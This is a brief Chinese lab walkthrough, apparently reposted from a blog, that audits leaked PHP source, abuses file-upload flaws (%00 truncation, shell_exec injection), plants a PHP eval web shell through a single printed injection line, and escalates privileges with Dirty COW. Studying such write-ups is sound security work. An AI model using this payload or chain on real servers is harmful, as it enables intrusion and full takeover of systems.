更具实验文件知道存在源码泄露 下载源码进行源码审计
发现admin账号
查看user.php 发现mysql 账号 端口
对登录后源码进行审计 发现上传文件的两处漏洞
对 fiel name 可以 %00 截断 上传一句话木马 对file name shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如
'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'
菜刀连接
上传脏牛提权
原文链接:http://www.cnblogs.com/feizianquan/p/11178319.html
本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728